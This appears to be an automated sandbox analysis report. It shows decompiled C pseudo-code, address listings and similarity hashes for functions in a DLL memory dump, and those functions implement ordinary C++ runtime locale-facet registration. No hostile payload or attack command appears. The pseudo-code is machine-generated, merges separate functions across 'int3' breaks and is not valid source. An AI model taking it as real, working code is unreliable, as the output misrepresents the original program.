0x6d48cea3
0x6d48ce6a
0x6d48ce6a
0x00000000
0x6d48ce6a
0x6d48ce68
0x6d48cddb
0x6d48cddb
0x6d48cdde
0x6d48cde2
0x6d48cde6
0x6d48cdf3
0x6d48cdfb
0x6d48cdfd
0x00000000
0x6d48cdfd
0x6d48cdc4
0x6d48cdc4
0x00000000
0x6d48cdc4
0x6d48cdc2
0x6d48cd35
0x6d48cd35
0x6d48cd38
0x6d48cd3c
0x6d48cd40
0x6d48cd4d
0x6d48cd55
0x6d48cd57
0x00000000
0x6d48cd57
0x6d48cd1e
0x6d48cd1e
0x00000000
0x6d48cd1e
0x6d48cd1c

APIs

__EH_prolog3.LIBCMT ref: 6D48CCE5
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a9f26cc067bd92913bbbe13ba6455fa9a3eee717c1871c7c32d2bbcafcc4c75f
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: a9f26cc067bd92913bbbe13ba6455fa9a3eee717c1871c7c32d2bbcafcc4c75f
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480C8E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;
				void* _t378;

				_t346 = __edx;
				_t265 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t374 - 0x14, 0);
				_t357 =  *0x6d53fdec; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6D451D10();
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6D476A77(_t374 - 0x14);
					return E6D490E67(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6D4827D7(__ebx, _t268, __edx, _t348, _t357, __eflags, _t378) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t374 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t348, _t357);
							E6D476A10(_t374 - 0x14, 0);
							_t358 =  *0x6d53fdc4; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6D451D10();
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6D476A77(_t374 - 0x14);
								return E6D490E67(_t349);
							} else {
								__eflags = _t358;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6D48283F(_t265, _t275, __edx, _t349, _t358, __eflags, _t378) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t374 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t265, _t349, _t358);
										E6D476A10(_t374 - 0x14, 0);
										_t359 =  *0x6d53fdf0; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6D451D10();
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6D476A77(_t374 - 0x14);
											return E6D490E67(_t350);
										} else {
											__eflags = _t359;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6D4828A7(_t265, _t282, __edx, _t350, _t359, __eflags, _t378) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t374 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t265, _t350, _t359);
													E6D476A10(_t374 - 0x14, 0);
													_t360 =  *0x6d53fdf4; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6D451D10();
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6D476A77(_t374 - 0x14);
														return E6D490E67(_t351);
													} else {
														__eflags = _t360;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6D48290F(_t265, _t289, _t346, _t351, _t360, __eflags, _t378) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t374 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t265, _t351, _t360);
																E6D476A10(_t374 - 0x14, 0);
																_t361 =  *0x6d53fe10; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6D451D10();
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6D476A77(_t374 - 0x14);
																	return E6D490E67(_t352);
																} else {
																	__eflags = _t361;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6D48298A(_t265, _t296, _t346, _t352, _t361, __eflags, _t378) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t374 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t265, _t352, _t361);
																			E6D476A10(_t374 - 0x14, 0);
																			_t362 =  *0x6d53fde0; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6D451D10();
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6D476A77(_t374 - 0x14);
																				return E6D490E67(_t353);
																			} else {
																				__eflags = _t362;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6D4829F6(_t265, _t303, _t346, _t353, _t362, __eflags, _t378) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t374 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t265, _t353, _t362);
																						E6D476A10(_t374 - 0x14, 0);
																						_t363 =  *0x6d53fe14; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6D451D10();
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6D476A77(_t374 - 0x14);
																							return E6D490E67(_t354);
																						} else {
																							__eflags = _t363;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6D482A62(_t265, _t310, _t346, _t354, _t363, __eflags, _t378) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t374 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t265, _t354, _t363);
																									E6D476A10(_t374 - 0x14, 0);
																									_t364 =  *0x6d53fde4; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6D451D10();
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6D452140( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6D476A77(_t374 - 0x14);
																										return E6D490E67(_t355);
																									} else {
																										__eflags = _t364;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6D482AC8(_t265, _t317, _t346, _t355, _t364, __eflags, _t378) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6D451940();
																												E6D4924F4(_t374 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(4);
																												E6D490E9E(0x6d4fefbc, _t265, _t355, _t364);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_push( *((intOrPtr*)(_t374 + 8)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6d5041ac;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6D4868B7(_t265, _t321, _t346, _t355, _t365,  *_t119, _t378);
																												return E6D490E67(_t365);
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6D478A0B(__eflags, _t355);
																												 *0x6d5001e8();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6d53fde4 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6D478A0B(__eflags, _t354);
																									 *0x6d5001e8();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6d53fe14 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6D478A0B(__eflags, _t353);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6d53fde0 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6D478A0B(__eflags, _t352);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6d53fe10 = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6D478A0B(__eflags, _t351);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6d53fdf4 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6D478A0B(__eflags, _t350);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6d53fdf0 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6D478A0B(__eflags, _t349);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6d53fdc4 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6D478A0B(__eflags, _t348);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6d53fdec = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6d480c8e
0x6d480c8e
0x6d480c8e
0x6d480c95
0x6d480c9f
0x6d480ca4
0x6d480caf
0x6d480cb3
0x6d480cb6
0x6d480cbb
0x6d480cbf
0x6d480cc4
0x6d480cc8
0x6d480d0d
0x6d480d10
0x6d480d1c
0x6d480cca
0x6d480ccc
0x6d480cd2
0x6d480cd8
0x6d480ce0
0x6d480ce3
0x6d480d20
0x6d480d2e
0x6d480d33
0x6d480d34
0x6d480d3b
0x6d480d45
0x6d480d4a
0x6d480d55
0x6d480d59
0x6d480d5c
0x6d480d61
0x6d480d6a
0x6d480d6c
0x6d480d6e
0x6d480db3
0x6d480db6
0x6d480dc2
0x6d480d70
0x6d480d70
0x6d480d72
0x6d480d78
0x6d480d7e
0x6d480d86
0x6d480d89
0x6d480dc6
0x6d480dd4
0x6d480dd9
0x6d480dda
0x6d480de1
0x6d480deb
0x6d480df0
0x6d480dfb
0x6d480dff
0x6d480e02
0x6d480e07
0x6d480e10
0x6d480e12
0x6d480e14
0x6d480e59
0x6d480e5c
0x6d480e68
0x6d480e16
0x6d480e16
0x6d480e18
0x6d480e1e
0x6d480e24
0x6d480e2c
0x6d480e2f
0x6d480e6c
0x6d480e7a
0x6d480e7f
0x6d480e80
0x6d480e87
0x6d480e91
0x6d480e96
0x6d480ea1
0x6d480ea5
0x6d480ea8
0x6d480ead
0x6d480eb6
0x6d480eb8
0x6d480eba
0x6d480eff
0x6d480f02
0x6d480f0e
0x6d480ebc
0x6d480ebc
0x6d480ebe
0x6d480ec4
0x6d480eca
0x6d480ed2
0x6d480ed5
0x6d480f12
0x6d480f20
0x6d480f25
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f5c
0x6d480f5e
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc

APIs

__EH_prolog3.LIBCMT ref: 6D480C95
std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 88b75f3488349ec23db59f1b7969a7d7ec371b7adbd489d570d8dc2e5f8a97b6
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 88b75f3488349ec23db59f1b7969a7d7ec371b7adbd489d570d8dc2e5f8a97b6
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D480F26(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;
				void* _t202;

				_t182 = __edx;
				_t141 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t198 - 0x14, 0);
				_t189 =  *0x6d53fe10; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6D451D10();
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6D476A77(_t198 - 0x14);
					return E6D490E67(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6D48298A(__ebx, _t144, __edx, _t184, _t189, __eflags, _t202) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t198 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t184, _t189);
							E6D476A10(_t198 - 0x14, 0);
							_t190 =  *0x6d53fde0; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6D451D10();
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6D476A77(_t198 - 0x14);
								return E6D490E67(_t185);
							} else {
								__eflags = _t190;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6D4829F6(_t141, _t151, __edx, _t185, _t190, __eflags, _t202) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t198 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t141, _t185, _t190);
										E6D476A10(_t198 - 0x14, 0);
										_t191 =  *0x6d53fe14; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6D451D10();
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6D476A77(_t198 - 0x14);
											return E6D490E67(_t186);
										} else {
											__eflags = _t191;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6D482A62(_t141, _t158, __edx, _t186, _t191, __eflags, _t202) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t198 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t141, _t186, _t191);
													E6D476A10(_t198 - 0x14, 0);
													_t192 =  *0x6d53fde4; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6D451D10();
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6D476A77(_t198 - 0x14);
														return E6D490E67(_t187);
													} else {
														__eflags = _t192;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6D482AC8(_t141, _t165, _t182, _t187, _t192, __eflags, _t202) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6D451940();
																E6D4924F4(_t198 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(4);
																E6D490E9E(0x6d4fefbc, _t141, _t187, _t192);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_push( *((intOrPtr*)(_t198 + 8)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6d5041ac;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6D4868B7(_t141, _t169, _t182, _t187, _t193,  *_t63, _t202);
																return E6D490E67(_t193);
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6D478A0B(__eflags, _t187);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6d53fde4 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6D478A0B(__eflags, _t186);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6d53fe14 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6D478A0B(__eflags, _t185);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6d53fde0 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6D478A0B(__eflags, _t184);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6d53fe10 = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6d480f26
0x6d480f26
0x6d480f26
0x6d480f2d
0x6d480f37
0x6d480f3c
0x6d480f47
0x6d480f4b
0x6d480f4e
0x6d480f53
0x6d480f57
0x6d480f5c
0x6d480f60
0x6d480fa5
0x6d480fa8
0x6d480fb4
0x6d480f62
0x6d480f64
0x6d480f6a
0x6d480f70
0x6d480f78
0x6d480f7b
0x6d480fb8
0x6d480fc6
0x6d480fcb
0x6d480fcc
0x6d480fd3
0x6d480fdd
0x6d480fe2
0x6d480fed
0x6d480ff1
0x6d480ff4
0x6d480ff9
0x6d481002
0x6d481004
0x6d481006
0x6d48104b
0x6d48104e
0x6d48105a
0x6d481008
0x6d481008
0x6d48100a
0x6d481010
0x6d481016
0x6d48101e
0x6d481021
0x6d48105e
0x6d48106c
0x6d481071
0x6d481072
0x6d481079
0x6d481083
0x6d481088
0x6d481093
0x6d481097
0x6d48109a
0x6d48109f
0x6d4810a8
0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
